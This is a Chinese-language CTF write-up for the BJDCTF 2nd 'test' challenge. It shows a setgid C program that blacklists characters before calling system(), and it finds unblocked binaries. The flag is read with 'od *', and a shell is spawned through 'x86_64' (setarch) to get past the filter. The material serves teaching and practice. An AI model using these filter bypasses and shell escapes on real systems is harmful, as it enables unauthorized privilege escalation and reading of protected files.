[BJDCTF 2nd] test

ssh -p 26619 [email protected]

连接服务器
[BJDCTF 2nd] test_第1张图片
没有读取flag的权限
看下test.c

#include 
#include 
#include 

int main(){
    char cmd[0x100] = {0};
    puts("Welcome to Pwn-Game by TaQini.");
    puts("Your ID:");
    system("id");
    printf("$ ");
    gets(cmd);
    if( strstr(cmd, "n")
       ||strstr(cmd, "e")
       ||strstr(cmd, "p")
       ||strstr(cmd, "b")
       ||strstr(cmd, "u")
       ||strstr(cmd, "s")
       ||strstr(cmd, "h")
       ||strstr(cmd, "i")
       ||strstr(cmd, "f")
       ||strstr(cmd, "l")
       ||strstr(cmd, "a")
       ||strstr(cmd, "g")
       ||strstr(cmd, "|")
       ||strstr(cmd, "/")
       ||strstr(cmd, "$")
       ||strstr(cmd, "`")
       ||strstr(cmd, "-")
       ||strstr(cmd, "<")
       ||strstr(cmd, ">")
       ||strstr(cmd, ".")){
        exit(0);    
    }else{
        system(cmd);
    }
    return 0;
}

提取下过滤的字符

a = '''    if( strstr(cmd, "n")
       ||strstr(cmd, "e")
       ||strstr(cmd, "p")
       ||strstr(cmd, "b")
       ||strstr(cmd, "u")
       ||strstr(cmd, "s")
       ||strstr(cmd, "h")
       ||strstr(cmd, "i")
       ||strstr(cmd, "f")
       ||strstr(cmd, "l")
       ||strstr(cmd, "a")
       ||strstr(cmd, "g")
       ||strstr(cmd, "|")
       ||strstr(cmd, "/")
       ||strstr(cmd, "$")
       ||strstr(cmd, "`")
       ||strstr(cmd, "-")
       ||strstr(cmd, "<")
       ||strstr(cmd, ">")
       ||strstr(cmd, ".")){'''
import re
print("|".join(re.findall("\"(.*?)\"",a)))

过滤了

n|e|p|b|u|s|h|i|f|l|a|g|||/|$|`|-|<|>|.

取掉特殊字符,使用grep过滤下,看看还有啥命令可以用

ctf@3c6d7673903c:~$ ls /usr/bin/ /bin/ | grep -v -E "n|e|p|b|u|s|h|i|f|l|a|g"
dd
kmod
mt
mv
rm

2to3
2to3-2.7
2to3-3.4
[
comm
od
tr
tty
w
wc
x86_64
xxd
ctf@3c6d7673903c:~$ 

还有一个od和x86_64可以使用
题目的预期解是:
运行test,会让用户输入一个命令,此时的权限可以读取flag

ctf@3c6d7673903c:~$ ./test 
Welcome to Pwn-Game by TaQini.
Your ID:
uid=1000(ctf) gid=1000(ctf) egid=1001(ctf_pwn) groups=1000(ctf)
$ od *
0000000 066146 063541 030573 062062 034060 031066 026462 032461
0000020 061145 032055 061142 026461 032541 060543 061055 034470
0000040 033463 061464 063061 031545 076544 077412 046105 001106
0000060 000401 000000 000000 000000 000000 001000 037000 000400

这里返回的8进制字符串就是flag
写脚本翻译一下

import binascii
tmp = "066146 063541 030573 062062 034060 031066 026462 032461 061145 032055 061142 026461 032541 060543 061055 034470 033463 061464 063061 031545 076544 077412 046105 001106 000401"
for i in tmp.split(" "):
	try:
		print(binascii.unhexlify(bytes(hex(int(i,8))[2:],encoding="UTF-8")).decode("utf-8")[::-1],end="")
	except Exception as e:
		continue

得到flag

flag{12d08622-15eb-4bb1-a5ca-b89374c1fe3d}

非预期解:
使用x86_64

ctf@3c6d7673903c:~$ ./test 
Welcome to Pwn-Game by TaQini.
Your ID:
uid=1000(ctf) gid=1000(ctf) egid=1001(ctf_pwn) groups=1000(ctf)
$ x86_64
$ id
uid=1000(ctf) gid=1000(ctf) egid=1001(ctf_pwn) groups=1000(ctf)
$ cat flag
flag{12d08622-15eb-4bb1-a5ca-b89374c1fe3d}
$ 

研究一些这玩意到底是啥

root@kali:~/guidang/BJD# which x86_64
/usr/bin/x86_64
root@kali:~/guidang/BJD# ls -l /usr/bin/x86_64
lrwxrwxrwx 1 root root 7 7月  28  2019 /usr/bin/x86_64 -> setarch

大概用途如下:

The execution domains currently only affects the output of uname -m.For example, on an AMD64 system, running setarch i386 program will.cause program to see i686 instead of x86_64 as the machine type. It also allows to set various personality options. The default program is /bin/sh.

你可能感兴趣的:(CTF-PWN)